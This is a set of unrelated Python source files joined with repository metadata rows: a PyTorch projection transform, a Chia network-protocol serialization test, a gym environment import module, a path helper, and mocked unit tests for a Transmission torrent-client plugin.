logger.debug("Set up projection from %s with dimension %s to %s with dimension %s", self.mode_in, self.input_dim, self.mode_out, self.output_dim)
assert self.input_dim_total >= self.output_dim_total, "Input dimension has to be at least as large as output dimension"
def forward(self, inputs, **kwargs):
if self.mode_in == "vector" and self.mode_out == "vector":
u = inputs[:, : self.output_dim]
rest = inputs[:, self.output_dim :]
elif self.mode_in == "image" and self.mode_out == "vector":
h = inputs.view(inputs.size(0), -1)
u = h[:, : self.output_dim]
rest = h[:, self.output_dim :]
else:
raise NotImplementedError("Unsupported projection modes {}, {}".format(self.mode_in, self.mode_out))
return u, rest
def inverse(self, inputs, **kwargs):
orthogonal_inputs = kwargs.get("orthogonal_inputs", torch.zeros(inputs.size(0), self.input_dim_total - self.output_dim))
if self.mode_in == "vector" and self.mode_out == "vector":
x = torch.cat((inputs, orthogonal_inputs), dim=1)
elif self.mode_in == "image" and self.mode_out == "vector":
c, h, w = self.input_dim
x = torch.cat((inputs, orthogonal_inputs), dim=1)
x = x.view(inputs.size(0), c, h, w)
else:
raise NotImplementedError("Unsupported projection modes {}, {}".format(self.mode_in, self.mode_out))
return x
class Projection(transforms.Transform):
def __init__(self, input_dim, output_dim):
super().__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.input_dim_total = product(input_dim)
self.output_dim_total = product(output_dim)
self.mode_in = "vector" if isinstance(input_dim, int) else "image"
self.mode_out = "vector" if isinstance(output_dim, int) else "image"
logger.debug("Set up projection from %s with dimension %s to %s with dimension %s", self.mode_in, self.input_dim, self.mode_out, self.output_dim)
assert self.input_dim_total >= self.output_dim_total, "Input dimension has to be at least as large as output dimension"
def forward(self, inputs, **kwargs):
if self.mode_in == "vector" and self.mode_out == "vector":
u = inputs[:, : self.output_dim]
elif self.mode_in == "image" and self.mode_out == "vector":
u = inputs.view(inputs.size(0), -1)
u = u[:, : self.output_dim]
else:
raise NotImplementedError("Unsupported projection modes {}, {}".format(self.mode_in, self.mode_out))
return u
def inverse(self, inputs, **kwargs):
if self.mode_in == "vector" and self.mode_out == "vector":
x = torch.cat((inputs, torch.zeros(inputs.size(0), self.input_dim - self.output_dim)), dim=1)
elif self.mode_in == "image" and self.mode_out == "vector":
c, h, w = self.input_dim
x = torch.cat((inputs, torch.zeros(inputs.size(0), self.input_dim_total - self.output_dim)), dim=1)
x = x.view(inputs.size(0), c, h, w)
else:
raise NotImplementedError("Unsupported projection modes {}, {}".format(self.mode_in, self.mode_out))
return x
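`Projection.forward` keeps the first `output_dim` coordinates and `Projection.inverse` zero-pads back to the ambient dimension. A torch-free, list-based sketch of that forward/inverse pair (illustrative only, not the repo's API):

```python
def project(x, output_dim):
    # Forward: keep the first output_dim coordinates of the vector.
    return x[:output_dim]

def inverse(u, input_dim):
    # Inverse: zero-pad the projected vector back to the ambient
    # dimension, mirroring Projection.inverse's concatenation with zeros.
    return u + [0.0] * (input_dim - len(u))

x = [3.0, 1.0, 4.0, 1.0, 5.0]
u = project(x, 2)
assert u == [3.0, 1.0]
assert inverse(u, 5) == [3.0, 1.0, 0.0, 0.0, 0.0]
```

Note that the round trip loses the trailing coordinates by design: the projection is only invertible on the manifold coordinates it keeps.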
| 45.682353 | 153 | 0.638681 | 532 | 3,883 | 4.447368 | 0.135338 | 0.108199 | 0.093407 | 0.071851 | 0.906171 | 0.885461 | 0.885461 | 0.865596 | 0.852071 | 0.852071 | 0 | 0.004386 | 0.236673 | 3,883 | 84 | 154 | 46.22619 | 0.79386 | 0 | 0 | 0.735294 | 0 | 0 | 0.13881 | 0 | 0 | 0 | 0 | 0 | 0.029412 | 1 | 0.088235 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bea4561ef5565595b83e197538c551dbc54d0b1c | 20,844 | py | Python | tests/util/test_network_protocol_files.py | Chinilla/chinilla-blockchain | 59bebcf94e65b74fbb53ad4929bbd79cb28be619 | [
"Apache-2.0"
] | 1 | 2022-03-22T18:11:52.000Z | 2022-03-22T18:11:52.000Z | tests/util/test_network_protocol_files.py | openchia/chia-blockchain | 1a2efa6ee21039b3ac6d9bdb48317b427872d525 | [
"Apache-2.0"
] | null | null | null | tests/util/test_network_protocol_files.py | openchia/chia-blockchain | 1a2efa6ee21039b3ac6d9bdb48317b427872d525 | [
"Apache-2.0"
] | null | null | null | # this file is generated by build_network_protocol_files.py
# flake8: noqa
from typing import Tuple
from pathlib import Path
from tests.util.network_protocol_data import *
from tests.util.protocol_messages_json import *
from tests.util.build_network_protocol_files import get_network_protocol_filename
def parse_blob(input_bytes: bytes) -> Tuple[bytes, bytes]:
size_bytes = input_bytes[:4]
input_bytes = input_bytes[4:]
size = int.from_bytes(size_bytes, "big")
message_bytes = input_bytes[:size]
input_bytes = input_bytes[size:]
return (message_bytes, input_bytes)
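`parse_blob` reads a 4-byte big-endian length prefix and returns the payload plus the unconsumed remainder. A self-contained sketch of the matching encoder and a round trip over two framed messages — `encode_blob` and `parse_all` are illustrative names, not part of the repo:

```python
from typing import List, Tuple

def encode_blob(message: bytes) -> bytes:
    # 4-byte big-endian length prefix followed by the payload,
    # matching what parse_blob expects.
    return len(message).to_bytes(4, "big") + message

def parse_blob(input_bytes: bytes) -> Tuple[bytes, bytes]:
    # Self-contained copy of parse_blob above, for this demo.
    size = int.from_bytes(input_bytes[:4], "big")
    return input_bytes[4 : 4 + size], input_bytes[4 + size :]

def parse_all(stream: bytes) -> List[bytes]:
    # Repeatedly parse frames until the stream is exhausted.
    messages = []
    while stream:
        message, stream = parse_blob(stream)
        messages.append(message)
    return messages

stream = encode_blob(b"hello") + encode_blob(b"world")
assert parse_all(stream) == [b"hello", b"world"]
```

The generated test below follows the same pattern: it walks the recorded byte stream one frame at a time, decoding each frame as the expected protocol message type.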
def test_protocol_bytes() -> None:
filename: Path = get_network_protocol_filename()
assert filename.exists()
with open(filename, "rb") as f:
input_bytes = f.read()
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_signage_point).from_bytes(message_bytes)
assert message == new_signage_point
assert bytes(message) == bytes(new_signage_point)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(declare_proof_of_space).from_bytes(message_bytes)
assert message == declare_proof_of_space
assert bytes(message) == bytes(declare_proof_of_space)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_signed_values).from_bytes(message_bytes)
assert message == request_signed_values
assert bytes(message) == bytes(request_signed_values)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(farming_info).from_bytes(message_bytes)
assert message == farming_info
assert bytes(message) == bytes(farming_info)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(signed_values).from_bytes(message_bytes)
assert message == signed_values
assert bytes(message) == bytes(signed_values)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_peak).from_bytes(message_bytes)
assert message == new_peak
assert bytes(message) == bytes(new_peak)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_transaction).from_bytes(message_bytes)
assert message == new_transaction
assert bytes(message) == bytes(new_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_transaction).from_bytes(message_bytes)
assert message == request_transaction
assert bytes(message) == bytes(request_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_transaction).from_bytes(message_bytes)
assert message == respond_transaction
assert bytes(message) == bytes(respond_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_proof_of_weight).from_bytes(message_bytes)
assert message == request_proof_of_weight
assert bytes(message) == bytes(request_proof_of_weight)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_proof_of_weight).from_bytes(message_bytes)
assert message == respond_proof_of_weight
assert bytes(message) == bytes(respond_proof_of_weight)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_block).from_bytes(message_bytes)
assert message == request_block
assert bytes(message) == bytes(request_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_block).from_bytes(message_bytes)
assert message == reject_block
assert bytes(message) == bytes(reject_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_blocks).from_bytes(message_bytes)
assert message == request_blocks
assert bytes(message) == bytes(request_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_blocks).from_bytes(message_bytes)
assert message == respond_blocks
assert bytes(message) == bytes(respond_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_blocks).from_bytes(message_bytes)
assert message == reject_blocks
assert bytes(message) == bytes(reject_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_block).from_bytes(message_bytes)
assert message == respond_block
assert bytes(message) == bytes(respond_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_unfinished_block).from_bytes(message_bytes)
assert message == new_unfinished_block
assert bytes(message) == bytes(new_unfinished_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_unfinished_block).from_bytes(message_bytes)
assert message == request_unfinished_block
assert bytes(message) == bytes(request_unfinished_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_unfinished_block).from_bytes(message_bytes)
assert message == respond_unfinished_block
assert bytes(message) == bytes(respond_unfinished_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_signage_point_or_end_of_subslot).from_bytes(message_bytes)
assert message == new_signage_point_or_end_of_subslot
assert bytes(message) == bytes(new_signage_point_or_end_of_subslot)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_signage_point_or_end_of_subslot).from_bytes(message_bytes)
assert message == request_signage_point_or_end_of_subslot
assert bytes(message) == bytes(request_signage_point_or_end_of_subslot)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_signage_point).from_bytes(message_bytes)
assert message == respond_signage_point
assert bytes(message) == bytes(respond_signage_point)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_end_of_subslot).from_bytes(message_bytes)
assert message == respond_end_of_subslot
assert bytes(message) == bytes(respond_end_of_subslot)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_mempool_transaction).from_bytes(message_bytes)
assert message == request_mempool_transaction
assert bytes(message) == bytes(request_mempool_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_compact_vdf).from_bytes(message_bytes)
assert message == new_compact_vdf
assert bytes(message) == bytes(new_compact_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_compact_vdf).from_bytes(message_bytes)
assert message == request_compact_vdf
assert bytes(message) == bytes(request_compact_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_compact_vdf).from_bytes(message_bytes)
assert message == respond_compact_vdf
assert bytes(message) == bytes(respond_compact_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_peers).from_bytes(message_bytes)
assert message == request_peers
assert bytes(message) == bytes(request_peers)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_peers).from_bytes(message_bytes)
assert message == respond_peers
assert bytes(message) == bytes(respond_peers)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_puzzle_solution).from_bytes(message_bytes)
assert message == request_puzzle_solution
assert bytes(message) == bytes(request_puzzle_solution)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(puzzle_solution_response).from_bytes(message_bytes)
assert message == puzzle_solution_response
assert bytes(message) == bytes(puzzle_solution_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_puzzle_solution).from_bytes(message_bytes)
assert message == respond_puzzle_solution
assert bytes(message) == bytes(respond_puzzle_solution)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_puzzle_solution).from_bytes(message_bytes)
assert message == reject_puzzle_solution
assert bytes(message) == bytes(reject_puzzle_solution)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(send_transaction).from_bytes(message_bytes)
assert message == send_transaction
assert bytes(message) == bytes(send_transaction)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(transaction_ack).from_bytes(message_bytes)
assert message == transaction_ack
assert bytes(message) == bytes(transaction_ack)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_peak_wallet).from_bytes(message_bytes)
assert message == new_peak_wallet
assert bytes(message) == bytes(new_peak_wallet)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_block_header).from_bytes(message_bytes)
assert message == request_block_header
assert bytes(message) == bytes(request_block_header)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_header_block).from_bytes(message_bytes)
assert message == respond_header_block
assert bytes(message) == bytes(respond_header_block)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_header_request).from_bytes(message_bytes)
assert message == reject_header_request
assert bytes(message) == bytes(reject_header_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_removals).from_bytes(message_bytes)
assert message == request_removals
assert bytes(message) == bytes(request_removals)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_removals).from_bytes(message_bytes)
assert message == respond_removals
assert bytes(message) == bytes(respond_removals)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_removals_request).from_bytes(message_bytes)
assert message == reject_removals_request
assert bytes(message) == bytes(reject_removals_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_additions).from_bytes(message_bytes)
assert message == request_additions
assert bytes(message) == bytes(request_additions)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_additions).from_bytes(message_bytes)
assert message == respond_additions
assert bytes(message) == bytes(respond_additions)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_additions).from_bytes(message_bytes)
assert message == reject_additions
assert bytes(message) == bytes(reject_additions)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_header_blocks).from_bytes(message_bytes)
assert message == request_header_blocks
assert bytes(message) == bytes(request_header_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(reject_header_blocks).from_bytes(message_bytes)
assert message == reject_header_blocks
assert bytes(message) == bytes(reject_header_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_header_blocks).from_bytes(message_bytes)
assert message == respond_header_blocks
assert bytes(message) == bytes(respond_header_blocks)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(coin_state).from_bytes(message_bytes)
assert message == coin_state
assert bytes(message) == bytes(coin_state)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(register_for_ph_updates).from_bytes(message_bytes)
assert message == register_for_ph_updates
assert bytes(message) == bytes(register_for_ph_updates)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_to_ph_updates).from_bytes(message_bytes)
assert message == respond_to_ph_updates
assert bytes(message) == bytes(respond_to_ph_updates)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(register_for_coin_updates).from_bytes(message_bytes)
assert message == register_for_coin_updates
assert bytes(message) == bytes(register_for_coin_updates)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_to_coin_updates).from_bytes(message_bytes)
assert message == respond_to_coin_updates
assert bytes(message) == bytes(respond_to_coin_updates)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(coin_state_update).from_bytes(message_bytes)
assert message == coin_state_update
assert bytes(message) == bytes(coin_state_update)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_children).from_bytes(message_bytes)
assert message == request_children
assert bytes(message) == bytes(request_children)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_children).from_bytes(message_bytes)
assert message == respond_children
assert bytes(message) == bytes(respond_children)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_ses_info).from_bytes(message_bytes)
assert message == request_ses_info
assert bytes(message) == bytes(request_ses_info)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_ses_info).from_bytes(message_bytes)
assert message == respond_ses_info
assert bytes(message) == bytes(respond_ses_info)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(pool_difficulty).from_bytes(message_bytes)
assert message == pool_difficulty
assert bytes(message) == bytes(pool_difficulty)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(harvester_handhsake).from_bytes(message_bytes)
assert message == harvester_handhsake
assert bytes(message) == bytes(harvester_handhsake)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_signage_point_harvester).from_bytes(message_bytes)
assert message == new_signage_point_harvester
assert bytes(message) == bytes(new_signage_point_harvester)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_proof_of_space).from_bytes(message_bytes)
assert message == new_proof_of_space
assert bytes(message) == bytes(new_proof_of_space)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_signatures).from_bytes(message_bytes)
assert message == request_signatures
assert bytes(message) == bytes(request_signatures)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_signatures).from_bytes(message_bytes)
assert message == respond_signatures
assert bytes(message) == bytes(respond_signatures)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(plot).from_bytes(message_bytes)
assert message == plot
assert bytes(message) == bytes(plot)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_plots).from_bytes(message_bytes)
assert message == request_plots
assert bytes(message) == bytes(request_plots)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_plots).from_bytes(message_bytes)
assert message == respond_plots
assert bytes(message) == bytes(respond_plots)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_peers_introducer).from_bytes(message_bytes)
assert message == request_peers_introducer
assert bytes(message) == bytes(request_peers_introducer)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_peers_introducer).from_bytes(message_bytes)
assert message == respond_peers_introducer
assert bytes(message) == bytes(respond_peers_introducer)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(authentication_payload).from_bytes(message_bytes)
assert message == authentication_payload
assert bytes(message) == bytes(authentication_payload)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(get_pool_info_response).from_bytes(message_bytes)
assert message == get_pool_info_response
assert bytes(message) == bytes(get_pool_info_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_partial_payload).from_bytes(message_bytes)
assert message == post_partial_payload
assert bytes(message) == bytes(post_partial_payload)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_partial_request).from_bytes(message_bytes)
assert message == post_partial_request
assert bytes(message) == bytes(post_partial_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_partial_response).from_bytes(message_bytes)
assert message == post_partial_response
assert bytes(message) == bytes(post_partial_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(get_farmer_response).from_bytes(message_bytes)
assert message == get_farmer_response
assert bytes(message) == bytes(get_farmer_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_farmer_payload).from_bytes(message_bytes)
assert message == post_farmer_payload
assert bytes(message) == bytes(post_farmer_payload)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_farmer_request).from_bytes(message_bytes)
assert message == post_farmer_request
assert bytes(message) == bytes(post_farmer_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(post_farmer_response).from_bytes(message_bytes)
assert message == post_farmer_response
assert bytes(message) == bytes(post_farmer_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(put_farmer_payload).from_bytes(message_bytes)
assert message == put_farmer_payload
assert bytes(message) == bytes(put_farmer_payload)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(put_farmer_request).from_bytes(message_bytes)
assert message == put_farmer_request
assert bytes(message) == bytes(put_farmer_request)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(put_farmer_response).from_bytes(message_bytes)
assert message == put_farmer_response
assert bytes(message) == bytes(put_farmer_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(error_response).from_bytes(message_bytes)
assert message == error_response
assert bytes(message) == bytes(error_response)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_peak_timelord).from_bytes(message_bytes)
assert message == new_peak_timelord
assert bytes(message) == bytes(new_peak_timelord)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_unfinished_block_timelord).from_bytes(message_bytes)
assert message == new_unfinished_block_timelord
assert bytes(message) == bytes(new_unfinished_block_timelord)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_infusion_point_vdf).from_bytes(message_bytes)
assert message == new_infusion_point_vdf
assert bytes(message) == bytes(new_infusion_point_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_signage_point_vdf).from_bytes(message_bytes)
assert message == new_signage_point_vdf
assert bytes(message) == bytes(new_signage_point_vdf)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_end_of_sub_slot_bundle).from_bytes(message_bytes)
assert message == new_end_of_sub_slot_bundle
assert bytes(message) == bytes(new_end_of_sub_slot_bundle)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_compact_proof_of_time).from_bytes(message_bytes)
assert message == request_compact_proof_of_time
assert bytes(message) == bytes(request_compact_proof_of_time)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(respond_compact_proof_of_time).from_bytes(message_bytes)
assert message == respond_compact_proof_of_time
assert bytes(message) == bytes(respond_compact_proof_of_time)
assert input_bytes == b""
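The dozens of parse/compare/round-trip triples above all follow one pattern, so the tail of this test could be collapsed into a single helper. A hedged sketch, not from the original file: `Msg` and the toy length-prefixed `parse_blob` below are stand-ins for the real protocol message types and the real parser.

```python
# Hedged sketch (not part of the original test): the repeated
# parse / compare / round-trip triple collapsed into one loop.
class Msg:
    """Toy stand-in for a protocol message with from_bytes/__bytes__."""

    def __init__(self, payload: bytes):
        self.payload = payload

    @classmethod
    def from_bytes(cls, data: bytes) -> "Msg":
        return cls(data)

    def __bytes__(self) -> bytes:
        return self.payload

    def __eq__(self, other) -> bool:
        return isinstance(other, Msg) and self.payload == other.payload


def parse_blob(blob: bytes):
    """Toy parser: split off one message (1-byte length prefix, then body)."""
    size = blob[0]
    return blob[1 : 1 + size], blob[1 + size :]


def assert_roundtrip_all(input_bytes: bytes, expected_messages) -> None:
    """Parse each blob, check equality and byte-for-byte round-trip."""
    for expected in expected_messages:
        message_bytes, input_bytes = parse_blob(input_bytes)
        message = type(expected).from_bytes(message_bytes)
        assert message == expected
        assert bytes(message) == bytes(expected)
    assert input_bytes == b""  # the entire input must be consumed


msgs = [Msg(b"abc"), Msg(b"xy")]
blob = b"".join(bytes([len(bytes(m))]) + bytes(m) for m in msgs)
assert_roundtrip_all(blob, msgs)
```

With the real `parse_blob` and the message instances from the test, the same helper would replace every repeated triple, keeping the final empty-input check in one place.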
# gym_linzhank/envs/__init__.py | repo: linZHank/gym-coop | license: MIT | hexsha: beb750ca5eeba275eb34244f4468d4b6b8be6f9a
from gym_linzhank.envs.solo_escaper_env import SoloEscaperEnv
from gym_linzhank.envs.tri_puller_env import TriPullerEnv
from gym_linzhank.envs.duo_carrier_env import DuoCarrierEnv
# tests/utils.py | repo: pyfaddist/faddist.assembler | license: MIT | hexsha: fe97fc1814fd4321e4e316858164606f64bbdbdf
import os

def absolute_path_to(*args):
return os.path.join(os.path.dirname(__file__), *args)
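The helper anchors relative names to the directory of the defining module, so fixture files travel with the tests regardless of the current working directory. A hedged usage sketch (the `"data"`/`"sample.yml"` names are illustrative, not from the repo):

```python
# Hedged usage sketch: same shape as the helper above; resolves names
# relative to the directory that contains this module.
import os


def absolute_path_to(*args):
    return os.path.join(os.path.dirname(__file__), *args)


fixture = absolute_path_to("data", "sample.yml")
# The result ends with the requested relative path, rooted at the module dir.
assert fixture.endswith(os.path.join("data", "sample.yml"))
```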
# tests/plugins/clients/test_transmission_plugin.py | repo: riefas/torrent | license: WTFPL | hexsha: 227d5b38ea509265f883b531c5f9d389344174a4
import base64
from collections import namedtuple
from datetime import datetime
from mock import patch, Mock
from ddt import ddt
import transmissionrpc
from tests import DbTestCase
from monitorrent.plugins.clients import TopicSettings
from monitorrent.plugins.clients.transmission import TransmissionClientPlugin
import pytz
import pytz.reference
@ddt
class TransmissionPluginTest(DbTestCase):
def test_settings(self):
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
self.assertIsNone(plugin.get_settings())
plugin.set_settings(settings)
readed_settings = plugin.get_settings()
expected = {'host': 'localhost', 'port': TransmissionClientPlugin.DEFAULT_PORT, 'username': 'monitorrent'}
self.assertEqual(expected, readed_settings)
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_check_connection_successfull(self, transmission_client):
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
self.assertNotEqual(False, plugin.check_connection())
transmission_client.assert_called_with(address='localhost', port=TransmissionClientPlugin.DEFAULT_PORT,
user='monitorrent', password='monitorrent')
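The patching pattern used throughout these tests reduces to its core: a `Mock` records every call made to it, and `assert_called_with` replays the expected constructor arguments. A minimal stdlib sketch (the port number and credentials here are illustrative, not taken from the plugin):

```python
from unittest.mock import Mock

# Mock stands in for transmissionrpc.Client, just as patch() does above.
client_cls = Mock()

# Code under test would construct the client like this:
client_cls(address='localhost', port=9091,
           user='monitorrent', password='monitorrent')

# The test then verifies the exact constructor arguments were used:
client_cls.assert_called_with(address='localhost', port=9091,
                              user='monitorrent', password='monitorrent')
```

`assert_called_with` checks only the most recent call; `assert_called_once_with`, used elsewhere in this file, additionally requires exactly one call.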
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_check_connection_without_credentials(self, transmission_client):
plugin = TransmissionClientPlugin()
self.assertFalse(plugin.check_connection())
transmission_client.assert_not_called()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_check_connection_connect_exception(self, transmission_client):
transmission_client.side_effect = transmissionrpc.TransmissionError
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
self.assertFalse(plugin.check_connection())
transmission_client.assert_called_with(address='localhost', port=TransmissionClientPlugin.DEFAULT_PORT,
user='monitorrent', password='monitorrent')
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_find_torrent(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
date_added = datetime(2015, 10, 9, 12, 3, 55, tzinfo=pytz.reference.LocalTimezone())
torrent_hash = 'SomeRandomHashMockString'
torrent_class = namedtuple('Torrent', ['name', 'date_added'])
rpc_client.get_torrent.return_value = torrent_class(name='Torrent 1', date_added=date_added)
torrent = plugin.find_torrent(torrent_hash)
self.assertEqual({'name': 'Torrent 1', 'date_added': date_added.astimezone(pytz.utc)}, torrent)
rpc_client.get_torrent.assert_called_once_with(torrent_hash.lower(),
['id', 'hashString', 'addedDate', 'name'])
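The timezone handling checked above hinges on one property: an aware datetime carrying a local offset denotes the same instant as its UTC form, so the two compare equal after `astimezone`. A hedged stdlib sketch, with `pytz.reference.LocalTimezone` replaced by a fixed offset so the example is deterministic:

```python
from datetime import datetime, timedelta, timezone

local = timezone(timedelta(hours=-7))             # e.g. PDT; illustrative
date_added = datetime(2015, 10, 9, 12, 3, 55, tzinfo=local)
as_utc = date_added.astimezone(timezone.utc)

assert as_utc == date_added                       # same instant in time
assert as_utc.hour == 19                          # 12:03 -07:00 is 19:03 UTC
```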
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_find_torrent_without_credentials(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
torrent_hash = 'SomeRandomHashMockString'
self.assertFalse(plugin.find_torrent(torrent_hash))
rpc_client.get_torrent.assert_not_called()
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_find_torrent_get_torrent_exception(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent_hash = 'SomeRandomHashMockString'
rpc_client.get_torrent.side_effect = KeyError
self.assertFalse(plugin.find_torrent(torrent_hash))
rpc_client.get_torrent.assert_called_once_with(torrent_hash.lower(),
['id', 'hashString', 'addedDate', 'name'])
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_add_torrent(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent = b'!torrent.content'
self.assertTrue(plugin.add_torrent(torrent, None))
rpc_client.add_torrent.assert_called_once_with(base64.b64encode(torrent).decode('utf-8'))
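The base64 step exists because Transmission's RPC accepts the `.torrent` payload as base64 text rather than raw bytes, which is why the assertion above encodes before comparing. The encoding is lossless, as a quick round-trip shows:

```python
import base64

torrent = b'!torrent.content'
encoded = base64.b64encode(torrent).decode('utf-8')

assert base64.b64decode(encoded) == torrent       # lossless round-trip
assert encoded == 'IXRvcnJlbnQuY29udGVudA=='
```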
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
def test_add_torrent_with_settings(self, transmission_client):
rpc_client = transmission_client.return_value
plugin = TransmissionClientPlugin()
settings = {'host': 'localhost', 'username': 'monitorrent', 'password': 'monitorrent'}
plugin.set_settings(settings)
torrent = b'!torrent.content'
self.assertTrue(plugin.add_torrent(torrent, TopicSettings('/path/to/download/dir')))
rpc_client.add_torrent.assert_called_once_with(base64.b64encode(torrent).decode('utf-8'), download_dir='/path/to/download/dir')
@patch('monitorrent.plugins.clients.transmission.transmissionrpc.Client')
